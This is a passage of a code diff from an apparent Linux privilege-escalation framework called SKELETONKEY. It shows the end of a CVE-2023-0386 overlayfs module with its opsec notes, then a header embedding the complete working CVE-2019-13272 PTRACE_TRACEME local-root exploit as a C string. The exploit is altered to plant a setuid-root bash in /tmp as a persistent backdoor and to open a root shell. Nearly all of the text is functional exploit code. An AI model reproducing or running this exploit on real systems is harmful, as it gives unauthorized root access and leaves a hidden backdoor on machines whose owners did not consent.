fprintf(stderr, "[-] overlayfs_setuid: built WITHOUT libfuse — the CVE-2023-0386 exploit needs a "
|
||||
"FUSE lower layer. Install libfuse3-dev (or libfuse-dev) and rebuild.\n");
|
||||
(void)OVERLAYFS_SU_PAYLOAD; (void)which_gcc; (void)write_file_str;
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
#endif /* OVLSU_HAVE_FUSE */
|
||||
|
||||
static skeletonkey_result_t overlayfs_setuid_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
@@ -471,7 +650,7 @@ const struct skeletonkey_module overlayfs_setuid_module = {
|
||||
.detect_sigma = overlayfs_setuid_sigma,
|
||||
.detect_yara = overlayfs_setuid_yara,
|
||||
.detect_falco = overlayfs_setuid_falco,
|
||||
.opsec_notes = "unshare(CLONE_NEWUSER|CLONE_NEWNS) + overlayfs mount with a setuid-root binary in lower (e.g. /usr/bin/su); chown on the merged view triggers copy-up that preserves the setuid bit in upper - but upper is owned by the unprivileged user. Overwrites upper-layer contents with attacker payload and execve's for root. Artifacts: /tmp/skeletonkey-ovlsu-XXXXXX/ (workdir with payload.c, binary, overlay mounts); cleanup callback removes these. Audit-visible via unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount(overlay) + chown on the merged view. No network. Dmesg silent on success.",
|
||||
.opsec_notes = "Faithful CVE-2023-0386 port: a libfuse filesystem exports a setuid-root /file (st_uid=0, mode 04777), mounted in the init ns via the setuid fusermount helper; then unshare(CLONE_NEWUSER|CLONE_NEWNS) + overlayfs mount with that FUSE mount as lowerdir; open(merged/file, O_WRONLY) triggers copy-up that materialises upper/file as a real setuid-root binary, which the unprivileged parent execs for root. Artifacts: /tmp/skeletonkey-ovlsu-XXXXXX/ (workdir: payload.c, the payload ELF, FUSE mount at lower/, overlay upper/work/merged), plus a setuid /tmp/.suid_bash and /tmp/skeletonkey-ovlsu-pwned witness dropped by the root payload; cleanup callback removes /tmp/skeletonkey-ovlsu-*. Audit-visible via mount(fuse) + fusermount execve + unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount(overlay), then a setuid-root binary exec by a non-root uid. No network. Dmesg silent on success.",
|
||||
.arch_support = "x86_64+unverified-arm64",
|
||||
};
|
||||
|
||||
|
||||
@@ -0,0 +1,571 @@
|
||||
/* ptrace_helper_src.h — AUTO-GENERATED. DO NOT EDIT BY HAND.
|
||||
*
|
||||
* Embedded source of the proven CVE-2019-13272 exploit (original author
|
||||
* Jann Horn / Google Project Zero #1903; auto-targeting + helper search by
|
||||
* bcoles). The only SKELETONKEY change vs upstream is spawn_shell(): instead
|
||||
* of only dropping into an interactive shell, it plants a root-owned proof
|
||||
* file (SK_PROOF) and a setuid-root bash (SK_ROOTBASH) so the module can
|
||||
* verify root out-of-band, and only execs an interactive shell on a tty.
|
||||
* The module writes this out, compiles it with unique -DSK_PROOF/-DSK_ROOTBASH
|
||||
* paths, runs it, and stat()s the artifacts to confirm uid==0.
|
||||
*/
|
||||
static const char ptrace_traceme_helper_src[] =
|
||||
"// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n"
|
||||
"//\n"
|
||||
"// Uses pkexec technique. Requires execution within the context\n"
|
||||
"// of a user session with an active PolKit agent.\n"
|
||||
"//\n"
|
||||
"// Exploitation will fail if kernel.yama.ptrace_scope >= 2;\n"
|
||||
"// or SELinux deny_ptrace=on.\n"
|
||||
"// ---\n"
|
||||
"// Original discovery and exploit author: Jann Horn\n"
|
||||
"// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903\n"
|
||||
"// ---\n"
|
||||
"// <bcoles@gmail.com>\n"
|
||||
"// - added known helper paths\n"
|
||||
"// - added search for suitable helpers\n"
|
||||
"// - added automatic targeting\n"
|
||||
"// - changed target suid executable from passwd to pkexec\n"
|
||||
"// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272\n"
|
||||
"// ---\n"
|
||||
"// Tested on:\n"
|
||||
"// - Ubuntu 16.04.5 kernel 4.15.0-29-generic\n"
|
||||
"// - Ubuntu 18.04.1 kernel 4.15.0-20-generic\n"
|
||||
"// - Ubuntu 18.04.3 kernel 5.0.0-23-generic\n"
|
||||
"// - Ubuntu 19.04 kernel 5.0.0-15-generic\n"
|
||||
"// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic\n"
|
||||
"// - Linux Mint 17.3 kernel 4.4.0-89-generic\n"
|
||||
"// - Linux Mint 18.3 kernel 4.13.0-16-generic\n"
|
||||
"// - Linux Mint 19 kernel 4.15.0-20-generic\n"
|
||||
"// - Xubuntu 16.04.4 kernel 4.13.0-36-generic\n"
|
||||
"// - ElementaryOS 0.4.1 4.8.0-52-generic\n"
|
||||
"// - Backbox 6 kernel 4.18.0-21-generic\n"
|
||||
"// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64\n"
|
||||
"// - Kali kernel 4.19.0-kali5-amd64\n"
|
||||
"// - MX 18.3 kernel 4.19.37-2~mx17+1\n"
|
||||
"// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64\n"
|
||||
"// - CentOS 8 kernel 4.18.0-80.el8.x86_64\n"
|
||||
"// - Debian 9.4.0 kernel 4.9.0-6-amd64\n"
|
||||
"// - Debian 10.0.0 kernel 4.19.0-5-amd64\n"
|
||||
"// - Devuan 2.0.0 kernel 4.9.0-6-amd64\n"
|
||||
"// - SparkyLinux 5.8 kernel 4.19.0-5-amd64\n"
|
||||
"// - SparkyLinux 5.9 kernel 4.19.0-6-amd64\n"
|
||||
"// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64\n"
|
||||
"// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO\n"
|
||||
"// - Mageia 6 kernel 4.9.35-desktop-1.mga6\n"
|
||||
"// - Antergos 18.7 kernel 4.17.6-1-ARCH\n"
|
||||
"// - lubuntu 19.04 kernel 5.0.0-13-generic\n"
|
||||
"// - Sabayon 19.03 kernel 4.20.0-sabayon\n"
|
||||
"// - Pop! OS 19.04 kernel 5.0.0-21-generic\n"
|
||||
"// ---\n"
|
||||
"// [user@localhost CVE-2019-13272]$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root\n"
|
||||
"// [user@localhost CVE-2019-13272]$ ./ptrace_traceme_root\n"
|
||||
"// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n"
|
||||
"// [.] Checking environment ...\n"
|
||||
"// [~] Done, looks good\n"
|
||||
"// [.] Searching policies for useful helpers ...\n"
|
||||
"// [.] Ignoring helper (does not exist): /usr/sbin/pk-device-rebind\n"
|
||||
"// [.] Trying helper: /usr/libexec/gsd-backlight-helper\n"
|
||||
"// [.] Spawning suid process (/usr/bin/pkexec) ...\n"
|
||||
"// [.] Tracing midpid ...\n"
|
||||
"// [~] Attached to midpid\n"
|
||||
"// [root@localhost CVE-2019-13272]# id\n"
|
||||
"// uid=0(root) gid=0(root) groups=0(root),1000(user)\n"
|
||||
"// [root@localhost CVE-2019-13272]# uname -a\n"
|
||||
"// Linux localhost.localdomain 4.18.0-80.el8.x86_64 #1 SMP Tue Jun 4 09:19:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux\n"
|
||||
"// ---\n"
|
||||
"\n"
|
||||
"#define _GNU_SOURCE\n"
|
||||
"#include <string.h>\n"
|
||||
"#include <stdlib.h>\n"
|
||||
"#include <unistd.h>\n"
|
||||
"#include <signal.h>\n"
|
||||
"#include <stdio.h>\n"
|
||||
"#include <fcntl.h>\n"
|
||||
"#include <sched.h>\n"
|
||||
"#include <stddef.h>\n"
|
||||
"#include <stdarg.h>\n"
|
||||
"#include <pwd.h>\n"
|
||||
"#include <sys/prctl.h>\n"
|
||||
"#include <sys/wait.h>\n"
|
||||
"#include <sys/ptrace.h>\n"
|
||||
"#include <sys/user.h>\n"
|
||||
"#include <sys/syscall.h>\n"
|
||||
"#include <sys/stat.h>\n"
|
||||
"#include <linux/elf.h>\n"
|
||||
"\n"
|
||||
"#define DEBUG\n"
|
||||
"\n"
|
||||
"#ifdef DEBUG\n"
|
||||
"# define dprintf printf\n"
|
||||
"#else\n"
|
||||
"# define dprintf\n"
|
||||
"#endif\n"
|
||||
"\n"
|
||||
"/*\n"
|
||||
" * enabled automatic targeting.\n"
|
||||
" * uses pkaction to search PolKit policy actions for viable helper executables.\n"
|
||||
" */\n"
|
||||
"#define ENABLE_AUTO_TARGETING 1\n"
|
||||
"\n"
|
||||
"/*\n"
|
||||
" * fall back to known helpers if automatic targeting fails.\n"
|
||||
" * note: use of these helpers may result in PolKit authentication\n"
|
||||
" * prompts on the session associated with the PolKit agent.\n"
|
||||
" */\n"
|
||||
"#define ENABLE_FALLBACK_HELPERS 1\n"
|
||||
"\n"
|
||||
"static const char *SHELL = \"/bin/bash\";\n"
|
||||
"\n"
|
||||
"/* SKELETONKEY: out-of-band proof + persistent root artifact paths.\n"
|
||||
" * Passed in at compile time (-DSK_PROOF=... -DSK_ROOTBASH=...) so each\n"
|
||||
" * run uses a unique path; env vars can't be used because the staged\n"
|
||||
" * execveat() re-execs carry an empty environment. */\n"
|
||||
"#ifndef SK_PROOF\n"
|
||||
"#define SK_PROOF \"/tmp/.skeletonkey-ptrace-proof\"\n"
|
||||
"#endif\n"
|
||||
"#ifndef SK_ROOTBASH\n"
|
||||
"#define SK_ROOTBASH \"/tmp/.skeletonkey-ptrace-rootbash\"\n"
|
||||
"#endif\n"
|
||||
"\n"
|
||||
"static int middle_success = 1;\n"
|
||||
"static int block_pipe[2];\n"
|
||||
"static int self_fd = -1;\n"
|
||||
"static int dummy_status;\n"
|
||||
"static const char *helper_path;\n"
|
||||
"static const char *pkexec_path = \"/usr/bin/pkexec\";\n"
|
||||
"static const char *pkaction_path = \"/usr/bin/pkaction\";\n"
|
||||
"struct stat st;\n"
|
||||
"\n"
|
||||
"const char *helpers[1024];\n"
|
||||
"\n"
|
||||
"/* known helpers to use if automatic targeting fails */\n"
|
||||
"#if ENABLE_FALLBACK_HELPERS\n"
|
||||
"const char *known_helpers[] = {\n"
|
||||
" \"/usr/lib/gnome-settings-daemon/gsd-backlight-helper\",\n"
|
||||
" \"/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper\",\n"
|
||||
" \"/usr/lib/unity-settings-daemon/usd-backlight-helper\",\n"
|
||||
" \"/usr/lib/unity-settings-daemon/usd-wacom-led-helper\",\n"
|
||||
" \"/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper\",\n"
|
||||
" \"/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper\",\n"
|
||||
" \"/usr/sbin/mate-power-backlight-helper\",\n"
|
||||
" \"/usr/sbin/xfce4-pm-helper\",\n"
|
||||
" \"/usr/bin/xfpm-power-backlight-helper\",\n"
|
||||
" \"/usr/bin/lxqt-backlight_backend\",\n"
|
||||
" \"/usr/libexec/gsd-wacom-led-helper\",\n"
|
||||
" \"/usr/libexec/gsd-wacom-oled-helper\",\n"
|
||||
" \"/usr/libexec/gsd-backlight-helper\",\n"
|
||||
" \"/usr/lib/gsd-backlight-helper\",\n"
|
||||
" \"/usr/lib/gsd-wacom-led-helper\",\n"
|
||||
" \"/usr/lib/gsd-wacom-oled-helper\",\n"
|
||||
" \"/usr/lib64/xfce4/session/xsfm-shutdown-helper\",\n"
|
||||
"};\n"
|
||||
"#endif\n"
|
||||
"\n"
|
||||
"/* helper executables known to cause problems (hang or fail) */\n"
|
||||
"const char *blacklisted_helpers[] = {\n"
|
||||
" \"/xf86-video-intel-backlight-helper\",\n"
|
||||
" \"/cpugovctl\",\n"
|
||||
" \"/resetxpad\",\n"
|
||||
" \"/package-system-locked\",\n"
|
||||
" \"/cddistupgrader\",\n"
|
||||
"};\n"
|
||||
"\n"
|
||||
"#define SAFE(expr) ({ \\\n"
|
||||
" typeof(expr) __res = (expr); \\\n"
|
||||
" if (__res == -1) { \\\n"
|
||||
" dprintf(\"[-] Error: %s\\n\", #expr); \\\n"
|
||||
" return 0; \\\n"
|
||||
" } \\\n"
|
||||
" __res; \\\n"
|
||||
"})\n"
|
||||
"#define max(a,b) ((a)>(b) ? (a) : (b))\n"
|
||||
"\n"
|
||||
"/*\n"
|
||||
" * execveat() syscall\n"
|
||||
" * https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl\n"
|
||||
" */\n"
|
||||
"#ifndef __NR_execveat\n"
|
||||
"# define __NR_execveat 322\n"
|
||||
"#endif\n"
|
||||
"\n"
|
||||
"/* temporary printf; returned pointer is valid until next tprintf */\n"
|
||||
"static char *tprintf(char *fmt, ...) {\n"
|
||||
" static char buf[10000];\n"
|
||||
" va_list ap;\n"
|
||||
" va_start(ap, fmt);\n"
|
||||
" vsprintf(buf, fmt, ap);\n"
|
||||
" va_end(ap);\n"
|
||||
" return buf;\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
"/*\n"
|
||||
" * fork, execute pkexec in parent, force parent to trace our child process,\n"
|
||||
" * execute suid executable (pkexec) in child.\n"
|
||||
" */\n"
|
||||
"static int middle_main(void *dummy) {\n"
|
||||
" prctl(PR_SET_PDEATHSIG, SIGKILL);\n"
|
||||
" pid_t middle = getpid();\n"
|
||||
"\n"
|
||||
" self_fd = SAFE(open(\"/proc/self/exe\", O_RDONLY));\n"
|
||||
"\n"
|
||||
" pid_t child = SAFE(fork());\n"
|
||||
" if (child == 0) {\n"
|
||||
" prctl(PR_SET_PDEATHSIG, SIGKILL);\n"
|
||||
"\n"
|
||||
" SAFE(dup2(self_fd, 42));\n"
|
||||
"\n"
|
||||
" /* spin until our parent becomes privileged (have to be fast here) */\n"
|
||||
" int proc_fd = SAFE(open(tprintf(\"/proc/%d/status\", middle), O_RDONLY));\n"
|
||||
" char *needle = tprintf(\"\\nUid:\\t%d\\t0\\t\", getuid());\n"
|
||||
" while (1) {\n"
|
||||
" char buf[1000];\n"
|
||||
" ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));\n"
|
||||
" buf[buflen] = '\\0';\n"
|
||||
" if (strstr(buf, needle)) break;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" /*\n"
|
||||
" * this is where the bug is triggered.\n"
|
||||
" * while our parent is in the middle of pkexec, we force it to become our\n"
|
||||
" * tracer, with pkexec's creds as ptracer_cred.\n"
|
||||
" */\n"
|
||||
" SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));\n"
|
||||
"\n"
|
||||
" /*\n"
|
||||
" * now we execute a suid executable (pkexec).\n"
|
||||
" * Because the ptrace relationship is considered to be privileged,\n"
|
||||
" * this is a proper suid execution despite the attached tracer,\n"
|
||||
" * not a degraded one.\n"
|
||||
" * at the end of execve(), this process receives a SIGTRAP from ptrace.\n"
|
||||
" */\n"
|
||||
" execl(pkexec_path, basename(pkexec_path), NULL);\n"
|
||||
"\n"
|
||||
" dprintf(\"[-] execl: Executing suid executable failed\");\n"
|
||||
" exit(EXIT_FAILURE);\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" SAFE(dup2(self_fd, 0));\n"
|
||||
" SAFE(dup2(block_pipe[1], 1));\n"
|
||||
"\n"
|
||||
" /* execute pkexec as current user */\n"
|
||||
" struct passwd *pw = getpwuid(getuid());\n"
|
||||
" if (pw == NULL) {\n"
|
||||
" dprintf(\"[-] getpwuid: Failed to retrieve username\");\n"
|
||||
" exit(EXIT_FAILURE);\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" middle_success = 1;\n"
|
||||
" execl(pkexec_path, basename(pkexec_path), \"--user\", pw->pw_name,\n"
|
||||
" helper_path,\n"
|
||||
" \"--help\", NULL);\n"
|
||||
" middle_success = 0;\n"
|
||||
" dprintf(\"[-] execl: Executing pkexec failed\");\n"
|
||||
" exit(EXIT_FAILURE);\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
"/* ptrace pid and wait for signal */\n"
|
||||
"static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {\n"
|
||||
" struct user_regs_struct regs;\n"
|
||||
" struct iovec iov = { .iov_base = ®s, .iov_len = sizeof(regs) };\n"
|
||||
" SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));\n"
|
||||
" SAFE(waitpid(pid, &dummy_status, 0));\n"
|
||||
" SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));\n"
|
||||
"\n"
|
||||
" /* set up indirect arguments */\n"
|
||||
" unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;\n"
|
||||
" struct injected_page {\n"
|
||||
" unsigned long argv[2];\n"
|
||||
" unsigned long envv[1];\n"
|
||||
" char arg0[8];\n"
|
||||
" char path[1];\n"
|
||||
" } ipage = {\n"
|
||||
" .argv = { scratch_area + offsetof(struct injected_page, arg0) }\n"
|
||||
" };\n"
|
||||
" strcpy(ipage.arg0, arg0);\n"
|
||||
" int i;\n"
|
||||
" for (i = 0; i < sizeof(ipage)/sizeof(long); i++) {\n"
|
||||
" unsigned long pdata = ((unsigned long *)&ipage)[i];\n"
|
||||
" SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),\n"
|
||||
" (void*)pdata));\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" /* execveat(exec_fd, path, argv, envv, flags) */\n"
|
||||
" regs.orig_rax = __NR_execveat;\n"
|
||||
" regs.rdi = exec_fd;\n"
|
||||
" regs.rsi = scratch_area + offsetof(struct injected_page, path);\n"
|
||||
" regs.rdx = scratch_area + offsetof(struct injected_page, argv);\n"
|
||||
" regs.r10 = scratch_area + offsetof(struct injected_page, envv);\n"
|
||||
" regs.r8 = AT_EMPTY_PATH;\n"
|
||||
"\n"
|
||||
" SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));\n"
|
||||
" SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));\n"
|
||||
" SAFE(waitpid(pid, &dummy_status, 0));\n"
|
||||
"\n"
|
||||
" return 0;\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
"static int middle_stage2(void) {\n"
|
||||
" /* our child is hanging in signal delivery from execve()'s SIGTRAP */\n"
|
||||
" pid_t child = SAFE(waitpid(-1, &dummy_status, 0));\n"
|
||||
" return force_exec_and_wait(child, 42, \"stage3\");\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
"// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *\n"
|
||||
"\n"
|
||||
"static int spawn_shell(void) {\n"
|
||||
" SAFE(setresgid(0, 0, 0));\n"
|
||||
" SAFE(setresuid(0, 0, 0));\n"
|
||||
" /* SKELETONKEY payload: we are now genuinely root. Drop an out-of-band,\n"
|
||||
" * root-owned proof file and a setuid-root bash the operator can use, then\n"
|
||||
" * (only on an interactive tty) hand off an interactive root shell. In the\n"
|
||||
" * module's automated run stdin is /dev/null, so we just exit cleanly after\n"
|
||||
" * planting the artifacts — the module verifies root by stat()'ing them. */\n"
|
||||
" system(\"id > \" SK_PROOF \" 2>&1; \"\n"
|
||||
" \"cp -f /bin/bash \" SK_ROOTBASH \" 2>/dev/null; \"\n"
|
||||
" \"chown 0:0 \" SK_ROOTBASH \" 2>/dev/null; \"\n"
|
||||
" \"chmod 4755 \" SK_ROOTBASH \" 2>/dev/null; \"\n"
|
||||
" \"chown 0:0 \" SK_PROOF \" 2>/dev/null; sync\");\n"
|
||||
" if (isatty(0)) {\n"
|
||||
" execlp(SHELL, basename(SHELL), NULL);\n"
|
||||
" dprintf(\"[-] execlp: Executing shell %s failed\", SHELL);\n"
|
||||
" }\n"
|
||||
" _exit(EXIT_SUCCESS);\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
"// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *\n"
|
||||
"\n"
|
||||
"static int check_env(void) {\n"
|
||||
" int warn = 0;\n"
|
||||
" const char* xdg_session = getenv(\"XDG_SESSION_ID\");\n"
|
||||
"\n"
|
||||
" dprintf(\"[.] Checking environment ...\\n\");\n"
|
||||
"\n"
|
||||
" if (stat(pkexec_path, &st) != 0) {\n"
|
||||
" dprintf(\"[-] Could not find pkexec executable at %s\\n\", pkexec_path);\n"
|
||||
" exit(EXIT_FAILURE);\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" if (stat(\"/dev/grsec\", &st) == 0) {\n"
|
||||
" dprintf(\"[!] Warning: grsec is in use\\n\");\n"
|
||||
" warn++;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" if (xdg_session == NULL) {\n"
|
||||
" dprintf(\"[!] Warning: $XDG_SESSION_ID is not set\\n\");\n"
|
||||
" warn++;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" if (system(\"/bin/loginctl --no-ask-password show-session \\\"$XDG_SESSION_ID\\\" | /bin/grep Remote=no >>/dev/null 2>>/dev/null\") != 0) {\n"
|
||||
" dprintf(\"[!] Warning: Could not find active PolKit agent\\n\");\n"
|
||||
" warn++;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" if (system(\"/sbin/sysctl kernel.yama.ptrace_scope 2>&1 | /bin/grep -q [23]\") == 0) {\n"
|
||||
" dprintf(\"[!] Warning: kernel.yama.ptrace_scope >= 2\\n\");\n"
|
||||
" warn++;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" if (stat(\"/usr/sbin/getsebool\", &st) == 0) {\n"
|
||||
" if (system(\"/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on\") == 0) {\n"
|
||||
" dprintf(\"[!] Warning: SELinux deny_ptrace is enabled\\n\");\n"
|
||||
" warn++;\n"
|
||||
" }\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" if (warn > 0) {\n"
|
||||
" dprintf(\"[~] Done, with %d warnings\\n\", warn);\n"
|
||||
" } else {\n"
|
||||
" dprintf(\"[~] Done, looks good\\n\");\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" return warn;\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
"/*\n"
|
||||
" * Use pkaction to search PolKit policy actions for viable helper executables.\n"
|
||||
" * Check each action for allow_active=yes, extract the associated helper path,\n"
|
||||
" * and check the helper path exists.\n"
|
||||
" */\n"
|
||||
"#if ENABLE_AUTO_TARGETING\n"
|
||||
"int find_helpers() {\n"
|
||||
" if (stat(pkaction_path, &st) != 0) {\n"
|
||||
" dprintf(\"[-] No helpers found. Could not find pkaction executable at %s.\\n\", pkaction_path);\n"
|
||||
" return 0;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" char cmd[1024];\n"
|
||||
" snprintf(cmd, sizeof(cmd), \"%s --verbose\", pkaction_path);\n"
|
||||
" FILE *fp;\n"
|
||||
" fp = popen(cmd, \"r\");\n"
|
||||
" if (fp == NULL) {\n"
|
||||
" dprintf(\"[-] Failed to run %s: %m\\n\", cmd);\n"
|
||||
" return 0;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" char line[1024];\n"
|
||||
" char buffer[2048];\n"
|
||||
" int helper_index = 0;\n"
|
||||
" int useful_action = 0;\n"
|
||||
" int blacklisted_helper = 0;\n"
|
||||
" static const char *needle = \"org.freedesktop.policykit.exec.path -> \";\n"
|
||||
" int needle_length = strlen(needle);\n"
|
||||
"\n"
|
||||
" while (fgets(line, sizeof(line)-1, fp) != NULL) {\n"
|
||||
" /* check the action uses allow_active=yes */\n"
|
||||
" if (strstr(line, \"implicit active:\")) {\n"
|
||||
" if (strstr(line, \"yes\")) {\n"
|
||||
" useful_action = 1;\n"
|
||||
" }\n"
|
||||
" continue;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" if (useful_action == 0)\n"
|
||||
" continue;\n"
|
||||
"\n"
|
||||
" useful_action = 0;\n"
|
||||
"\n"
|
||||
" /* extract the helper path */\n"
|
||||
" int length = strlen(line);\n"
|
||||
" char* found = memmem(&line[0], length, needle, needle_length);\n"
|
||||
" if (found == NULL)\n"
|
||||
" continue;\n"
|
||||
"\n"
|
||||
" memset(buffer, 0, sizeof(buffer));\n"
|
||||
" int i;\n"
|
||||
" for (i = 0; found[needle_length + i] != '\\n'; i++) {\n"
|
||||
" if (i >= sizeof(buffer)-1)\n"
|
||||
" continue;\n"
|
||||
" buffer[i] = found[needle_length + i];\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" /* check helper path against helpers defined in 'blacklisted_helpers' array */\n"
|
||||
" blacklisted_helper = 0;\n"
|
||||
" for (i=0; i<sizeof(blacklisted_helpers)/sizeof(blacklisted_helpers[0]); i++) {\n"
|
||||
" if (strstr(&buffer[0], blacklisted_helpers[i]) != 0) {\n"
|
||||
" dprintf(\"[.] Ignoring helper (blacklisted): %s\\n\", &buffer[0]);\n"
|
||||
" blacklisted_helper = 1;\n"
|
||||
" break;\n"
|
||||
" }\n"
|
||||
" }\n"
|
||||
" if (blacklisted_helper == 1)\n"
|
||||
" continue;\n"
|
||||
"\n"
|
||||
" /* check the path exists */\n"
|
||||
" if (stat(&buffer[0], &st) != 0) {\n"
|
||||
" dprintf(\"[.] Ignoring helper (does not exist): %s\\n\", &buffer[0]);\n"
|
||||
" continue;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" helpers[helper_index] = strndup(&buffer[0], strlen(buffer));\n"
|
||||
" helper_index++;\n"
|
||||
"\n"
|
||||
" if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))\n"
|
||||
" break;\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" pclose(fp);\n"
|
||||
" return 0;\n"
|
||||
"}\n"
|
||||
"#endif\n"
|
||||
"\n"
|
||||
"// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *\n"
|
||||
"\n"
|
||||
"int ptrace_traceme_root() {\n"
|
||||
" dprintf(\"[.] Trying helper: %s\\n\", helper_path);\n"
|
||||
"\n"
|
||||
" /*\n"
|
||||
" * set up a pipe such that the next write to it will block: packet mode,\n"
|
||||
" * limited to one packet\n"
|
||||
" */\n"
|
||||
" SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));\n"
|
||||
" SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));\n"
|
||||
" char dummy = 0;\n"
|
||||
" SAFE(write(block_pipe[1], &dummy, 1));\n"
|
||||
"\n"
|
||||
" /* spawn pkexec in a child, and continue here once our child is in execve() */\n"
|
||||
" dprintf(\"[.] Spawning suid process (%s) ...\\n\", pkexec_path);\n"
|
||||
" static char middle_stack[1024*1024];\n"
|
||||
" pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),\n"
|
||||
" CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));\n"
|
||||
" if (!middle_success) return 1;\n"
|
||||
"\n"
|
||||
" /*\n"
|
||||
" * wait for our child to go through both execve() calls (first pkexec, then\n"
|
||||
" * the executable permitted by polkit policy).\n"
|
||||
" */\n"
|
||||
" while (1) {\n"
|
||||
" int fd = open(tprintf(\"/proc/%d/comm\", midpid), O_RDONLY);\n"
|
||||
" char buf[16];\n"
|
||||
" int buflen = SAFE(read(fd, buf, sizeof(buf)-1));\n"
|
||||
" buf[buflen] = '\\0';\n"
|
||||
" *strchrnul(buf, '\\n') = '\\0';\n"
|
||||
" if (strncmp(buf, basename(helper_path), 15) == 0)\n"
|
||||
" break;\n"
|
||||
" usleep(100000);\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" /*\n"
|
||||
" * our child should have gone through both the privileged execve() and the\n"
|
||||
" * following execve() here\n"
|
||||
" */\n"
|
||||
" dprintf(\"[.] Tracing midpid ...\\n\");\n"
|
||||
" SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));\n"
|
||||
" SAFE(waitpid(midpid, &dummy_status, 0));\n"
|
||||
" dprintf(\"[~] Attached to midpid\\n\");\n"
|
||||
"\n"
|
||||
" force_exec_and_wait(midpid, 0, \"stage2\");\n"
|
||||
" exit(EXIT_SUCCESS);\n"
|
||||
"}\n"
|
||||
"\n"
|
||||
"int main(int argc, char **argv) {\n"
|
||||
" if (strcmp(argv[0], \"stage2\") == 0)\n"
|
||||
" return middle_stage2();\n"
|
||||
" if (strcmp(argv[0], \"stage3\") == 0)\n"
|
||||
" return spawn_shell();\n"
|
||||
"\n"
|
||||
" dprintf(\"Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\\n\");\n"
|
||||
"\n"
|
||||
" check_env();\n"
|
||||
"\n"
|
||||
" if (argc > 1 && strcmp(argv[1], \"check\") == 0) {\n"
|
||||
" exit(0);\n"
|
||||
" }\n"
|
||||
"\n"
|
||||
" int i;\n"
|
||||
"\n"
|
||||
"#if ENABLE_AUTO_TARGETING\n"
|
||||
" /* search polkit policies for helper executables */\n"
|
||||
" dprintf(\"[.] Searching policies for useful helpers ...\\n\");\n"
|
||||
" find_helpers();\n"
|
||||
" for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {\n"
|
||||
" if (helpers[i] == NULL)\n"
|
||||
" break;\n"
|
||||
"\n"
|
||||
" if (stat(helpers[i], &st) != 0)\n"
|
||||
" continue;\n"
|
||||
"\n"
|
||||
" helper_path = helpers[i];\n"
|
||||
" ptrace_traceme_root();\n"
|
||||
" }\n"
|
||||
"#endif\n"
|
||||
"\n"
|
||||
"#if ENABLE_FALLBACK_HELPERS\n"
|
||||
" /* search for known helpers defined in 'known_helpers' array */\n"
|
||||
" dprintf(\"[.] Searching for known helpers ...\\n\");\n"
|
||||
" for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {\n"
|
||||
" if (stat(known_helpers[i], &st) != 0)\n"
|
||||
" continue;\n"
|
||||
